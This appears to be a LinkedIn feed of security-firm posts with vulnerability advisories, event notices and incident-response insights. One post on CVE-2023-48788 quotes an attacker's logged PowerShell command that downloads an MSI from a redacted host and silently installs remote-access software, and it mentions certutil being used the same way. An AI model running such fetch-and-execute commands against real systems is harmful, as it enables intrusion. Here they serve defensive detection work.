SEC Consult Group

🚨 Incident Response: Lessons Learned from the Frontlines 🚨 In the ever-evolving world of cyber threats, adaptability and teamwork are 🔑. At SEC Defence, we're constantly refining our strategies to tackle unique challenges. 🛡️ Recently, we faced a particularly intriguing ransomware case that taught us some invaluable lessons. 💡 To share these insights, our colleague Ivan Boranijasevic interviewed Michael Popovtschak, the incident lead at SEC Consult Group, who expertly navigated the case. 🤝 Their discussion highlights the power of collaboration and shared experiences in staying ahead of emerging threats. 🔗 Read more about this fascinating case and the lessons learned in our latest blog post: https://lnkd.in/gRzaNTRh #CyberSecurity #IncidentResponse #Ransomware #teamsecconsult

🚨 SEC Consult Identifies Critical Security Issues in High-End Network Scanners 🚨 We are announcing the results of the extensive security analysis Daniel 🦌 Hirschberger ⛰️ and Tobias Niemann on Image Access GmbH' Scan2Net platform, used in their premium WideTEK and Bookeye scanners. While these products promise unparalleled performance and high security, our findings revealed a different picture. 💡Advisory: https://lnkd.in/dcWpiqg6 Summary: 🔒 Our team discovered 14 critical vulnerabilities affecting firmware versions ≤7.42, including: 👉 OS Command Injection (RCE) 👉 Privilege Escalation 👉 Cross-Site Scripting (XSS) 👉 SQL Injection 👉 Hardcoded Credentials ❗This case underlines the importance of robust security practices and reflects the rising expectations under the Cyber Resilience Act. It’s a wake-up call for vendors to prioritize security as much as innovation to protect the networks of customers, e.g. within public authorities or critical infrastructure.   Next Steps: 📝 If you use Scan2Net devices, update immediately to firmware 7.42B and check the vendor’s support page for future updates 📝 Ensure that the Scan2Net devices are not reachable over the Internet and restrict internal access as much as possible 📝 Vendors: Interested in a security review or need help navigating compliance requirements such as #CRA or #NIS2? Let our experts assist you. Let’s work together to ensure a safer digital future! #CyberSecurity #IoTSecurity #CyberResilienceAct #CRA

Security Advisory: Stored Cross-Site Scripting Vulnerability in Omada Identity (CVE-2024-52951) 🚨 https://lnkd.in/gQatfpKc A stored cross-site scripting (#XSS) vulnerability was identified by Daniel 🦌 Hirschberger ⛰️ in Omada Identity, a popular enterprise-ready Identity Governance and Administration (IGA) solution. This issue allows authenticated users to execute arbitrary JavaScript in the browsers of other users who view manipulated "History" entries, potentially exposing higher-privileged users to phishing or other malicious activities. 🤨 What Happened?    • An authenticated user could inject malicious JavaScript into the "Request Reason" field of an access request.    • When another user (e.g., a manager reviewing the request) views the request history, the script executes in their browser. 🚦 Impact: The vulnerability can be exploited to target privileged users, enabling attackers to:    • Perform phishing attacks.    • Execute arbitrary JavaScript for data theft or further privilege escalation attacks. 🚨Affected Versions    • Users of v14.14 or lower should apply Hotfix #309.    • Upgrading to v15U1 is strongly recommended. 🚨 Vendor Response Timeline Omada has acknowledged and addressed this issue with a coordinated response. Hotfixes and updates have been released. Special thanks to their team for their cooperation! #CVD 🛟What should you do?    1. Upgrade to version v15U1 if possible.    2. If upgrading is not feasible, apply Hotfix #309 for version v14.14.    3. Conduct a thorough security review of your Omada Identity implementation to identify any additional vulnerabilities or configuration issues. Organizations using Omada Identity should immediately patch their installations and implement routine security reviews to minimize risks. For full details and proof of concept, take a look at our technical security advisory. 💡 Stay secure and vigilant. Proactive updates save organizations from reactive crises! #CyberSecurity #Vulnerability #XSS #InfoSec

[Event] 🌥️ Cloudy with a Chance of DORA 🌩️ 📢 Live Hacking a Cloud Infrastructure – Free Webinar 🚀 📅 Date: December 5, 2024 ⏰ Time: 10:00 - 11:00 (CET) 📍 Language: German What’s in store: ✅ How DORA impacts cloud operations ✅ A deep dive into cloud penetration testing ✅ Key responsibilities for cloud security ✅ Live hacking demo: See how attackers could steal sensitive bank customer data! Meet your expert: 🧑💻 Moritz Gruber – Team Lead Offensive Security, SEC Consult Germany 🔗 Save your spot now: https://lnkd.in/dUGY5XwG 📌 Don’t miss out—level up your cloud security knowledge today! #DORA #CyberSecurity #CloudSecurity

💻 Debunking Cloud Security Myths: Are You Putting Your Business at Risk? Two common myths could jeopardize your company's cloud safety: ☁️ "The provider takes care of all data security in the cloud." 🔍 "A cloud security scanner finds all vulnerabilities—no need for a penetration test!" These misconceptions can leave your organization vulnerable. Our latest blog post dives deep into these myths, explains their risks, and helps you understand what’s truly needed for cloud security. 👉 Read now to secure your business in the cloud: https://lnkd.in/dqsJN9h2 At SEC Consult, we help you uncover hidden vulnerabilities with tailored cloud penetration tests and expert guidance. Let’s make your cloud environment truly secure. 🛡 #CloudSecurity #CyberSecurity

📋 Stefan Viehböck and Constantin Schieber-Knöbl identified vulnerabilitites in Siemens Communication Elements CPCX26 (CP-2016, CP-2019) and SM-2558 Protocol Element 🚨 Webserver vulnerability: A buffer overflow vulnerability was discovered in the HTTP header parsing of the affected devices. 🚨 JTAG interface: Full access to the Zynq-7000 JTAG interface is possible on the SM-2558. 🔧 Fix status: The SM-2558 hardware is end-of-life (EOL) and will not receive a new HW revision. For these, we recommend assessing the need for mitigation or replacement. 👉 Full details and recommendations are available here: https://lnkd.in/d75ScFZ3 Staying informed is the first step to staying secure.

🚨 #CyberSecurity Insight 🚨 Fortigate Exploit (CVE-2023-48788): What Traces Did It Leave? 🚨 In a recent investigation of this exploit, we uncovered critical indicators that attackers left behind on affected hosts. Here's what we found: 💡 Two attack variants were used: 1️⃣ MSSQL Eventlogs (MSSQL$FCEMS): Look for xp_cmdshell (EventID 15457). 2️⃣ PowerShell Logs (EventID 600): Observed commands downloading and installing Splashtop: HostApplication=powershell iwr -uri http://[redacted]/setup.msi -outfile C:\Windows\Temp\[redacted].msi ; msiexec /i C:\Windows\Temp\[redacted].msi /Qn 3️⃣ Certutil Activity: In another variant, attackers used certutil to deploy ScreenConnect (aka ConnectWise), leaving traces in MSSQL$FCEMS. ⚙ When Sysmon is installed: EventID 1 (Process Creation) and EventID 11 (File Creation) provided even more details on the attack's execution. 🔍 Key Takeaway: Regularly monitoring your logs and having tools like Sysmon in place can make all the difference in detecting and mitigating such threats. ➡️ If you’d like a proactive health check or assistance during an active attack, don’t hesitate to reach out to our experts directly. Our SEC Defence team is available 24/7 through our emergency hotline: https://lnkd.in/ekUqPnv 🇩🇪 Germany +49 30 398 2027 77 🇦🇹 Austria +43 1 890 30 43 7777 🇨🇭 Switzerland +41 44 545 10 85

We’re happy to announce that we’ll be attending BSides Vienna tomorrow! 🎉 📍 Location: Urania Dachsaal, Uraniastraße 1, 1010 Vienna 👨💻 Don’t miss our very own Timo Longin, Senior Security Consultant at SEC Consult, delivering his talk: "SMTP Smuggling Revisited – Still Spoofing E-mails Worldwide?!" 📅 When: 23.11, 14:10–14:40 📍 Where: Track 1 (Dachsaal) 🌍 BSides is a global series of community-driven events that promote independent security research, education, and collaboration. Whether you're here for the talks, workshops, or the amazing people, BSides Vienna is the place to be. Let’s meet, learn, and push the boundaries of security research together. See you there! 👾 #BSidesVienna #Cybersecurity #InfosecCommunity #Networking

⚠️ Ransomgroup Helldown: Ongoing attack campaign on #Zyxel firewalls even with newest patch‼️ We observed multiple compromises in October 2024 and other institutions seem to observe similar cases! Our experts did a blogpost to highlight the need to remain vigilant and monitor activity on the Zyxel Firewalls! Find details on our blogpost: 👉 https://lnkd.in/dwa7h9yM #ransomware #secdefence #attack

🚨 New Blog Alert from SEC Defence! 🚨 Imagine stopping a #ransomware attack before it even starts—sounds like a win, right? 🙌 In her latest blog, our expert Barbara O. dives into a real 2024 case where proactive investigation and early detection saved the day. 💻 Key takeaway: Sometimes, all it takes is a suspicion to uncover an active intrusion and kick the attackers out before they can do any damage. This is a must-read for anyone looking to strengthen their cybersecurity defenses! 🔗 Read now: https://lnkd.in/dRFWUYRf #CyberSecurity #Ransomware #IncidentResponse